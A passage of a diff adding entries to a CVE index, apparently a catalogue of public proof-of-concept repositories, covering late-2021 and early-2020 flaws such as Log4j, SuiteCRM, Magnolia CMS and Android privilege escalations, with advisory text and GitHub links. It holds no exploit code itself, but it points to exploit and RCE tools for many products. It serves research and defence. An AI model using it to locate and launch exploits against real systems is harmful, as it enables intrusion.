(RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2. + + +- [cckuailong/log4j_RCE_CVE-2021-44832](https://github.com/cckuailong/log4j_RCE_CVE-2021-44832) +- [name/log4j-scanner](https://github.com/name/log4j-scanner) + +### CVE-2021-44852 (2022-01-01) + +An issue was discovered in BS_RCIO64.sys in Biostar RACING GT Evo 2.1.1905.1700. A low-integrity process can open the driver's device object and issue IOCTLs to read or write to arbitrary physical memory locations (or call an arbitrary address), leading to execution of arbitrary code. This is associated with 0x226040, 0x226044, and 0x226000. + + +- [CrackerCat/CVE-2021-44852](https://github.com/CrackerCat/CVE-2021-44852) + +### CVE-2021-44906 (2022-03-17) + +Minimist <=1.2.5 is vulnerable to Prototype Pollution via file index.js, function setKey() (lines 69-95). + + +- [nevermoe/CVE-2021-44906](https://github.com/nevermoe/CVE-2021-44906) + +### CVE-2021-44909 +- [g1thub3r1st4/CVE-2021-44909](https://github.com/g1thub3r1st4/CVE-2021-44909) + +### CVE-2021-44910 +- [W000i/CVE-2021-44910_SpringBlade](https://github.com/W000i/CVE-2021-44910_SpringBlade) + +### CVE-2021-45007 (2022-02-20) + +Plesk 18.0.37 is affected by a Cross Site Request Forgery (CSRF) vulnerability that allows an attacker to insert data on the user and admin panel. NOTE: the vendor states that this is only a site-specific problem on websites of one or more Plesk users + + +- [AS4mir/CVE-2021-45007](https://github.com/AS4mir/CVE-2021-45007) + +### CVE-2021-45008 (2022-02-21) + +Plesk CMS 18.0.37 is affected by an insecure permissions vulnerability that allows privilege Escalation from user to admin rights. OTE: the vendor states that this is only a site-specific problem on websites of one or more Plesk users + + +- [AS4mir/CVE-2021-45008](https://github.com/AS4mir/CVE-2021-45008) + +### CVE-2021-45010 (2022-03-15) + +A path traversal vulnerability in the file upload functionality in tinyfilemanager.php in Tiny File Manager before 2.4.7 allows remote attackers (with valid user accounts) to upload malicious PHP files to the webroot, leading to code execution. + + +- [febinrev/CVE-2021-45010-TinyFileManager-Exploit](https://github.com/febinrev/CVE-2021-45010-TinyFileManager-Exploit) +- [BKreisel/CVE-2021-45010](https://github.com/BKreisel/CVE-2021-45010) +- [Syd-SydneyJr/CVE-2021-45010](https://github.com/Syd-SydneyJr/CVE-2021-45010) + +### CVE-2021-45026 (2022-06-17) + +ASG technologies ASG-Zena Cross Platform Server Enterprise Edition 4.2.1 is vulnerable to Cross Site Scripting (XSS). + + +- [JetP1ane/Zena-CVE-2021-45026](https://github.com/JetP1ane/Zena-CVE-2021-45026) + +### CVE-2021-45041 (2021-12-19) + +SuiteCRM before 7.12.2 and 8.x before 8.0.1 allows authenticated SQL injection via the Tooltips action in the Project module, involving resource_id and start_date. + + +- [manuelz120/CVE-2021-45041](https://github.com/manuelz120/CVE-2021-45041) + +### CVE-2021-45043 (2021-12-15) + +HD-Network Real-time Monitoring System 2.0 allows ../ directory traversal to read /etc/shadow via the /language/lang s_Language parameter. + + +- [crypt0g30rgy/cve-2021-45043](https://github.com/crypt0g30rgy/cve-2021-45043) + +### CVE-2021-45046 (2021-12-14) + +It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default. + + +- [cckuailong/Log4j_CVE-2021-45046](https://github.com/cckuailong/Log4j_CVE-2021-45046) +- [BobTheShoplifter/CVE-2021-45046-Info](https://github.com/BobTheShoplifter/CVE-2021-45046-Info) +- [tejas-nagchandi/CVE-2021-45046](https://github.com/tejas-nagchandi/CVE-2021-45046) +- [pravin-pp/log4j2-CVE-2021-45046](https://github.com/pravin-pp/log4j2-CVE-2021-45046) +- [mergebase/log4j-samples](https://github.com/mergebase/log4j-samples) +- [lukepasek/log4jjndilookupremove](https://github.com/lukepasek/log4jjndilookupremove) +- [ludy-dev/cve-2021-45046](https://github.com/ludy-dev/cve-2021-45046) +- [lijiejie/log4j2_vul_local_scanner](https://github.com/lijiejie/log4j2_vul_local_scanner) +- [CaptanMoss/Log4Shell-Sandbox-Signature](https://github.com/CaptanMoss/Log4Shell-Sandbox-Signature) +- [shaily29-eng/CyberSecurity_CVE-2021-45046](https://github.com/shaily29-eng/CyberSecurity_CVE-2021-45046) + +### CVE-2021-45067 (2022-01-14) + +Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an Access of Memory Location After End of Buffer vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. + + +- [hacksysteam/CVE-2021-45067](https://github.com/hacksysteam/CVE-2021-45067) + +### CVE-2021-45105 (2021-12-18) + +Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1. + + +- [cckuailong/Log4j_dos_CVE-2021-45105](https://github.com/cckuailong/Log4j_dos_CVE-2021-45105) +- [pravin-pp/log4j2-CVE-2021-45105](https://github.com/pravin-pp/log4j2-CVE-2021-45105) +- [tejas-nagchandi/CVE-2021-45105](https://github.com/tejas-nagchandi/CVE-2021-45105) +- [iAmSOScArEd/log4j2_dos_exploit](https://github.com/iAmSOScArEd/log4j2_dos_exploit) +- [dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105](https://github.com/dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105) +- [dileepdkumar/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105](https://github.com/dileepdkumar/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105) +- [dileepdkumar/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105-v](https://github.com/dileepdkumar/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105-v) +- [dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105-1](https://github.com/dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105-1) +- [name/log4j-remediation](https://github.com/name/log4j-remediation) + +### CVE-2021-45232 (2021-12-27) + +In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin`, all APIs and authentication middleware are developed based on framework `droplet`, but some API directly use the interface of framework `gin` thus bypassing the authentication. + + +- [Osyanina/westone-CVE-2021-45232-scanner](https://github.com/Osyanina/westone-CVE-2021-45232-scanner) +- [badboycxcc/CVE-2021-45232-POC](https://github.com/badboycxcc/CVE-2021-45232-POC) +- [LTiDi2000/CVE-2021-45232](https://github.com/LTiDi2000/CVE-2021-45232) +- [Ilovewomen/cve-2021-45232](https://github.com/Ilovewomen/cve-2021-45232) +- [jxpsx/CVE-2021-45232-RCE](https://github.com/jxpsx/CVE-2021-45232-RCE) +- [wuppp/cve-2021-45232-exp](https://github.com/wuppp/cve-2021-45232-exp) +- [dskho/CVE-2021-45232](https://github.com/dskho/CVE-2021-45232) +- [GYLQ/CVE-2021-45232-RCE](https://github.com/GYLQ/CVE-2021-45232-RCE) +- [fany0r/CVE-2021-45232-RCE](https://github.com/fany0r/CVE-2021-45232-RCE) +- [YutuSec/Apisix_Crack](https://github.com/YutuSec/Apisix_Crack) + +### CVE-2021-45416 (2022-02-01) + +Reflected Cross-site scripting (XSS) vulnerability in RosarioSIS 8.2.1 allows attackers to inject arbitrary HTML via the search_term parameter in the modules/Scheduling/Courses.php script. + + +- [86x/CVE-2021-45416](https://github.com/86x/CVE-2021-45416) +- [dnr6419/CVE-2021-45416](https://github.com/dnr6419/CVE-2021-45416) + +### CVE-2021-45428 (2022-01-03) + +TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats. + + +- [projectforsix/CVE-2021-45428-Defacer](https://github.com/projectforsix/CVE-2021-45428-Defacer) + +### CVE-2021-45468 (2022-01-14) + +Imperva Web Application Firewall (WAF) before 2021-12-23 allows remote unauthenticated attackers to use "Content-Encoding: gzip" to evade WAF security controls and send malicious HTTP POST requests to web servers behind the WAF. + + +- [0xhaggis/Imperva_gzip_bypass](https://github.com/0xhaggis/Imperva_gzip_bypass) + +### CVE-2021-45485 (2021-12-25) + +In the IPv6 implementation in the Linux kernel before 5.13.3, net/ipv6/output_core.c has an information leak because of certain use of a hash table which, although big, doesn't properly consider that IPv6-based attackers can typically choose among many IPv6 source addresses. + + +- [Satheesh575555/linux-4.19.72_CVE-2021-45485](https://github.com/Satheesh575555/linux-4.19.72_CVE-2021-45485) + +### CVE-2021-45744 (2022-01-06) + +A Stored Cross Site Scripting (XSS) vulnerability exists in bludit 3.13.1 via the TAGS section in login panel. + + +- [plsanu/Bludit-3.13.1-TAGS-Field-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Bludit-3.13.1-TAGS-Field-Stored-Cross-Site-Scripting-XSS) +- [plsanu/CVE-2021-45744](https://github.com/plsanu/CVE-2021-45744) + +### CVE-2021-45745 (2022-01-06) + +A Stored Cross Site Scripting (XSS) vulnerability exists in Bludit 3.13.1 via the About Plugin in login panel. + + +- [plsanu/Bludit-3.13.1-About-Plugin-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Bludit-3.13.1-About-Plugin-Stored-Cross-Site-Scripting-XSS) +- [plsanu/CVE-2021-45745](https://github.com/plsanu/CVE-2021-45745) + +### CVE-2021-45897 (2022-01-28) + +SuiteCRM before 7.12.3 and 8.x before 8.0.2 allows remote code execution. + + +- [manuelz120/CVE-2021-45897](https://github.com/manuelz120/CVE-2021-45897) + +### CVE-2021-45901 (2022-02-10) + +The password-reset form in ServiceNow Orlando provides different responses to invalid authentication attempts depending on whether the username exists. + + +- [9lyph/CVE-2021-45901](https://github.com/9lyph/CVE-2021-45901) + +### CVE-2021-45960 (2022-01-01) + +In Expat (aka libexpat) before 2.4.3, a left shift by 29 (or more) places in the storeAtts function in xmlparse.c can lead to realloc misbehavior (e.g., allocating too few bytes, or only freeing memory). + + +- [nanopathi/external_expat_AOSP10_r33_CVE-2021-45960](https://github.com/nanopathi/external_expat_AOSP10_r33_CVE-2021-45960) +- [Trinadh465/external_lib_AOSP10_r33_CVE-2021-45960_CVE-2021-46143-](https://github.com/Trinadh465/external_lib_AOSP10_r33_CVE-2021-45960_CVE-2021-46143-) +- [hshivhare67/external_expat_v2.2.6_CVE-2021-45960](https://github.com/hshivhare67/external_expat_v2.2.6_CVE-2021-45960) + +### CVE-2021-46005 (2022-01-18) + +Sourcecodester Car Rental Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via vehicalorcview parameter. + + +- [nawed20002/CVE-2021-46005](https://github.com/nawed20002/CVE-2021-46005) + +### CVE-2021-46063 (2022-02-18) + +MCMS v5.2.5 was discovered to contain a Server Side Template Injection (SSTI) vulnerability via the Template Management module. + + +- [miguelc49/CVE-2021-46063-2](https://github.com/miguelc49/CVE-2021-46063-2) +- [miguelc49/CVE-2021-46063-1](https://github.com/miguelc49/CVE-2021-46063-1) +- [miguelc49/CVE-2021-46063-3](https://github.com/miguelc49/CVE-2021-46063-3) + +### CVE-2021-46067 (2022-01-06) + +In Vehicle Service Management System 1.0 an attacker can steal the cookies leading to Full Account Takeover. + + +- [plsanu/Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover) +- [plsanu/CVE-2021-46067](https://github.com/plsanu/CVE-2021-46067) + +### CVE-2021-46068 (2022-01-06) + +A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel. + + +- [plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS) +- [plsanu/CVE-2021-46068](https://github.com/plsanu/CVE-2021-46068) + +### CVE-2021-46069 (2022-01-06) + +A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel. + + +- [plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Mechanic-List-Stored-Cross-Site-Scripting-XSS) +- [plsanu/CVE-2021-46069](https://github.com/plsanu/CVE-2021-46069) + +### CVE-2021-46070 (2022-01-06) + +A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service Requests Section in login panel. + + +- [plsanu/Vehicle-Service-Management-System-Service-Requests-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Service-Requests-Stored-Cross-Site-Scripting-XSS) +- [plsanu/CVE-2021-46070](https://github.com/plsanu/CVE-2021-46070) + +### CVE-2021-46071 (2022-01-06) + +A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Category List Section in login panel. + + +- [plsanu/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Category-List-Stored-Cross-Site-Scripting-XSS) +- [plsanu/CVE-2021-46071](https://github.com/plsanu/CVE-2021-46071) + +### CVE-2021-46072 (2022-01-06) + +A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Service List Section in login panel. + + +- [plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS) +- [plsanu/CVE-2021-46072](https://github.com/plsanu/CVE-2021-46072) + +### CVE-2021-46073 (2022-01-06) + +A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the User List Section in login panel. + + +- [plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS) +- [plsanu/CVE-2021-46073](https://github.com/plsanu/CVE-2021-46073) + +### CVE-2021-46074 (2022-01-06) + +A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the Settings Section in login panel. + + +- [plsanu/Vehicle-Service-Management-System-Settings-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Settings-Stored-Cross-Site-Scripting-XSS) +- [plsanu/CVE-2021-46074](https://github.com/plsanu/CVE-2021-46074) + +### CVE-2021-46075 (2022-01-06) + +A Privilege Escalation vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. Staff account users can access the admin resources and perform CRUD Operations. + + +- [plsanu/Vehicle-Service-Management-System-Multiple-Privilege-Escalation-Leads-to-CRUD-Operations](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-Privilege-Escalation-Leads-to-CRUD-Operations) +- [plsanu/CVE-2021-46075](https://github.com/plsanu/CVE-2021-46075) + +### CVE-2021-46076 (2022-01-06) + +Sourcecodester Vehicle Service Management System 1.0 is vulnerable to File upload. An attacker can upload a malicious php file in multiple endpoints it leading to Code Execution. + + +- [plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution) +- [plsanu/CVE-2021-46076](https://github.com/plsanu/CVE-2021-46076) + +### CVE-2021-46078 (2022-01-06) + +An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to a Stored Cross-Site Scripting vulnerability. + + +- [plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting) +- [plsanu/CVE-2021-46078](https://github.com/plsanu/CVE-2021-46078) + +### CVE-2021-46079 (2022-01-06) + +An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to Html Injection. + + +- [plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection) +- [plsanu/CVE-2021-46079](https://github.com/plsanu/CVE-2021-46079) + +### CVE-2021-46080 (2022-01-06) + +A Cross Site Request Forgery (CSRF) vulnerability exists in Vehicle Service Management System 1.0. An successful CSRF attacks leads to Stored Cross Site Scripting Vulnerability. + + +- [plsanu/Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS) +- [plsanu/CVE-2021-46080](https://github.com/plsanu/CVE-2021-46080) + +### CVE-2021-46108 (2022-02-18) + +D-Link DSL-2730E CT-20131125 devices allow XSS via the username parameter to the password page in the maintenance configuration. + + +- [g-rubert/CVE-2021-46108](https://github.com/g-rubert/CVE-2021-46108) + +### CVE-2021-46143 (2022-01-06) + +In doProlog in xmlparse.c in Expat (aka libexpat) before 2.4.3, an integer overflow exists for m_groupSize. + + +- [nanopathi/external_expat_AOSP10_r33_CVE-2021-46143](https://github.com/nanopathi/external_expat_AOSP10_r33_CVE-2021-46143) + +### CVE-2021-46361 (2022-02-11) + +An issue in the Freemark Filter of Magnolia CMS v6.2.11 and below allows attackers to bypass security restrictions and execute arbitrary code via a crafted FreeMarker payload. + + +- [mbadanoiu/CVE-2021-46361](https://github.com/mbadanoiu/CVE-2021-46361) + +### CVE-2021-46362 (2022-02-11) + +A Server-Side Template Injection (SSTI) vulnerability in the Registration and Forgotten Password forms of Magnolia v6.2.3 and below allows attackers to execute arbitrary code via a crafted payload entered into the fullname parameter. + + +- [mbadanoiu/CVE-2021-46362](https://github.com/mbadanoiu/CVE-2021-46362) + +### CVE-2021-46363 (2022-02-11) + +An issue in the Export function of Magnolia v6.2.3 and below allows attackers to perform Formula Injection attacks via crafted CSV/XLS files. These formulas may result in arbitrary code execution on a victim's computer when opening the exported files with Microsoft Excel. + + +- [mbadanoiu/CVE-2021-46363](https://github.com/mbadanoiu/CVE-2021-46363) + +### CVE-2021-46364 (2022-02-11) + +A vulnerability in the Snake YAML parser of Magnolia CMS v6.2.3 and below allows attackers to execute arbitrary code via a crafted YAML file. + + +- [mbadanoiu/CVE-2021-46364](https://github.com/mbadanoiu/CVE-2021-46364) + +### CVE-2021-46365 (2022-02-11) + +An issue in the Export function of Magnolia v6.2.3 and below allows attackers to execute XML External Entity attacks via a crafted XLF file. + + +- [mbadanoiu/CVE-2021-46365](https://github.com/mbadanoiu/CVE-2021-46365) + +### CVE-2021-46366 (2022-02-11) + +An issue in the Login page of Magnolia CMS v6.2.3 and below allows attackers to exploit both an Open Redirect vulnerability and Cross-Site Request Forgery (CSRF) in order to brute force and exfiltrate users' credentials. + + +- [mbadanoiu/CVE-2021-46366](https://github.com/mbadanoiu/CVE-2021-46366) + +### CVE-2021-46381 (2022-03-04) + +Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow]. + + +- [JCPpeiqi/-cve-2021-46381](https://github.com/JCPpeiqi/-cve-2021-46381) + +### CVE-2021-46398 (2022-02-04) + +A Cross-Site Request Forgery vulnerability exists in Filebrowser < 2.18.0 that allows attackers to create a backdoor user with admin privilege and get access to the filesystem via a malicious HTML webpage that is sent to the victim. An admin can run commands using the FileBrowser and hence it leads to RCE. + + +- [febinrev/CVE-2021-46398_Chamilo-LMS-RCE](https://github.com/febinrev/CVE-2021-46398_Chamilo-LMS-RCE) +- [LalieA/CVE-2021-46398](https://github.com/LalieA/CVE-2021-46398) + +### CVE-2021-46417 (2022-04-07) + +Insecure handling of a download function leads to disclosure of internal files due to path traversal with root privileges in Franklin Fueling Systems Colibri Controller Module 1.8.19.8580. + + +- [Henry4E36/CVE-2021-46417](https://github.com/Henry4E36/CVE-2021-46417) + +### CVE-2021-46422 (2022-04-27) + +Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication. + + +- [nobodyatall648/CVE-2021-46422](https://github.com/nobodyatall648/CVE-2021-46422) +- [Chocapikk/CVE-2021-46422](https://github.com/Chocapikk/CVE-2021-46422) +- [twoning/CVE-2021-46422_PoC](https://github.com/twoning/CVE-2021-46422_PoC) +- [Awei507/CVE-RCE](https://github.com/Awei507/CVE-RCE) +- [yigexioabai/CVE-2021-46422_RCE](https://github.com/yigexioabai/CVE-2021-46422_RCE) +- [ZAxyr/CVE-2021-46422](https://github.com/ZAxyr/CVE-2021-46422) +- [xanszZZ/SDT_CW3B1_rce](https://github.com/xanszZZ/SDT_CW3B1_rce) +- [latings/CVE-2021-46422](https://github.com/latings/CVE-2021-46422) +- [CJ-0107/cve-2021-46422](https://github.com/CJ-0107/cve-2021-46422) +- [kelemaoya/CVE-2021-46422](https://github.com/kelemaoya/CVE-2021-46422) +- [yyqxi/CVE-2021-46422](https://github.com/yyqxi/CVE-2021-46422) +- [polerstar/CVE-2021-46422-poc](https://github.com/polerstar/CVE-2021-46422-poc) +- [kailing0220/CVE-2021-46422](https://github.com/kailing0220/CVE-2021-46422) +- [tucommenceapousser/CVE-2021-46422](https://github.com/tucommenceapousser/CVE-2021-46422) + +### CVE-2021-46702 (2022-02-26) + +Tor Browser 9.0.7 on Windows 10 build 10586 is vulnerable to information disclosure. This could allow local attackers to bypass the intended anonymity feature and obtain information regarding the onion services visited by a local user. This can be accomplished by analyzing RAM memory even several hours after the local user used the product. This occurs because the product doesn't properly free memory. + + +- [Exmak-s/CVE-2021-46702](https://github.com/Exmak-s/CVE-2021-46702) + +### CVE-2021-46703 (2022-03-06) + +In the IsolatedRazorEngine component of Antaris RazorEngine through 4.5.1-alpha001, an attacker can execute arbitrary .NET code in a sandboxed environment (if users can externally control template contents). NOTE: This vulnerability only affects products that are no longer supported by the maintainer + + +- [BenEdridge/CVE-2021-46703](https://github.com/BenEdridge/CVE-2021-46703) + +### CVE-2021-46704 (2022-03-06) + +In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check. + + +- [MithatGuner/CVE-2021-46704-POC](https://github.com/MithatGuner/CVE-2021-46704-POC) +- [Erenlancaster/CVE-2021-46704](https://github.com/Erenlancaster/CVE-2021-46704) + +### CVE-2021-56789 +- [DataSurgeon-ds/ds-cve-plugin](https://github.com/DataSurgeon-ds/ds-cve-plugin) + +### CVE-2021-268855 +- [sikkertech/CVE-2021-268855](https://github.com/sikkertech/CVE-2021-268855) + ## 2020 +### CVE-2020-0001 (2020-01-08) + +In getProcessRecordLocked of ActivityManagerService.java isolated apps are not handled correctly. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-8.0, Android-8.1, Android-9, and Android-10 Android ID: A-140055304 + + +- [Zachinio/CVE-2020-0001](https://github.com/Zachinio/CVE-2020-0001) + +### CVE-2020-0014 (2020-02-13) + +It is possible for a malicious application to construct a TYPE_TOAST window manually and make that window clickable. This could lead to a local escalation of privilege with no additional execution privileges needed. User action is needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-128674520 + + +- [tea9/CVE-2020-0014-Toast](https://github.com/tea9/CVE-2020-0014-Toast) + +### CVE-2020-0022 (2020-02-13) + +In reassemble_and_dispatch of packet_fragmenter.cc, there is possible out of bounds write due to an incorrect bounds calculation. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-143894715 + + +- [leommxj/cve-2020-0022](https://github.com/leommxj/cve-2020-0022) +- [k3vinlusec/Bluefrag_CVE-2020-0022](https://github.com/k3vinlusec/Bluefrag_CVE-2020-0022) +- [Polo35/CVE-2020-0022](https://github.com/Polo35/CVE-2020-0022) +- [5k1l/cve-2020-0022](https://github.com/5k1l/cve-2020-0022) +- [lsw29475/CVE-2020-0022](https://github.com/lsw29475/CVE-2020-0022) +- [devdanqtuan/poc-for-cve-2020-0022](https://github.com/devdanqtuan/poc-for-cve-2020-0022) +- [themmokhtar/CVE-2020-0022](https://github.com/themmokhtar/CVE-2020-0022) + +### CVE-2020-0023 (2020-02-13) + +In setPhonebookAccessPermission of AdapterService.java, there is a possible disclosure of user contacts over bluetooth due to a missing permission check. This could lead to local information disclosure if a malicious app enables contacts over a bluetooth connection, with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-145130871 + + +- [362902755/CVE-2020-0023](https://github.com/362902755/CVE-2020-0023) + +### CVE-2020-0041 (2020-03-10) + +In binder_transaction of binder.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-145988638References: Upstream kernel + + +- [bluefrostsecurity/CVE-2020-0041](https://github.com/bluefrostsecurity/CVE-2020-0041) +- [j4nn/CVE-2020-0041](https://github.com/j4nn/CVE-2020-0041) +- [koharin/CVE-2020-0041](https://github.com/koharin/CVE-2020-0041) +- [vaginessa/CVE-2020-0041-Pixel-3a](https://github.com/vaginessa/CVE-2020-0041-Pixel-3a) +- [jcalabres/root-exploit-pixel3](https://github.com/jcalabres/root-exploit-pixel3) + +### CVE-2020-0069 (2020-03-10) + +In the ioctl handlers of the Mediatek Command Queue driver, there is a possible out of bounds write due to insufficient input sanitization and missing SELinux restrictions. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-147882143References: M-ALPS04356754 + + +- [R0rt1z2/AutomatedRoot](https://github.com/R0rt1z2/AutomatedRoot) +- [TheRealJunior/mtk-su-reverse-cve-2020-0069](https://github.com/TheRealJunior/mtk-su-reverse-cve-2020-0069) +- [yanglingxi1993/CVE-2020-0069](https://github.com/yanglingxi1993/CVE-2020-0069) +- [quarkslab/CVE-2020-0069_poc](https://github.com/quarkslab/CVE-2020-0069_poc) +- [0xf15h/mtk_su](https://github.com/0xf15h/mtk_su) + +### CVE-2020-0082 (2020-04-17) + +In ExternalVibration of ExternalVibration.java, there is a possible activation of an arbitrary intent due to unsafe deserialization. This could lead to local escalation of privilege to system_server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-140417434 + + +- [0x742/CVE-2020-0082-ExternalVibration](https://github.com/0x742/CVE-2020-0082-ExternalVibration) + +### CVE-2020-0096 (2020-05-14) + +In startActivities of ActivityStartController.java, there is a possible escalation of privilege due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9Android ID: A-145669109 + + +- [wyu0hop/CVE-2020-0096](https://github.com/wyu0hop/CVE-2020-0096) +- [liuyun201990/StrandHogg2](https://github.com/liuyun201990/StrandHogg2) +- [tea9/CVE-2020-0096-StrandHogg2](https://github.com/tea9/CVE-2020-0096-StrandHogg2) +- [nahid0x1/CVE-2020-0096-strandhogg-exploit-p0c](https://github.com/nahid0x1/CVE-2020-0096-strandhogg-exploit-p0c) + +### CVE-2020-0108 (2020-08-11) + +In postNotification of ServiceRecord.java, there is a possible bypass of foreground process restrictions due to an uncaught exception. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-8.1 Android-9Android ID: A-140108616 + + +- [CrackerCat/ServiceCheater](https://github.com/CrackerCat/ServiceCheater) + +### CVE-2020-0113 (2020-06-10) + +In sendCaptureResult of Camera3OutputUtils.cpp, there is a possible out of bounds read due to a use after free. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-9Android ID: A-150944913 + + +- [XDo0/ServiceCheater](https://github.com/XDo0/ServiceCheater) + +### CVE-2020-0114 (2020-06-10) + +In onCreateSliceProvider of KeyguardSliceProvider.java, there is a possible confused deputy due to a PendingIntent error. This could lead to local escalation of privilege that allows actions performed as the System UI, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-147606347 + + +- [tea9/CVE-2020-0114-systemui](https://github.com/tea9/CVE-2020-0114-systemui) + +### CVE-2020-0121 (2020-06-10) + +In updateUidProcState of AppOpsService.java, there is a possible permission bypass due to a logic error. This could lead to local information disclosure of location data with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-148180766 + + +- [mooneee/CVE-2020-0121](https://github.com/mooneee/CVE-2020-0121) + +### CVE-2020-0136 (2020-06-11) + +In multiple locations of Parcel.cpp, there is a possible out-of-bounds write due to an integer overflow. This could lead to local escalation of privilege in the system server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: 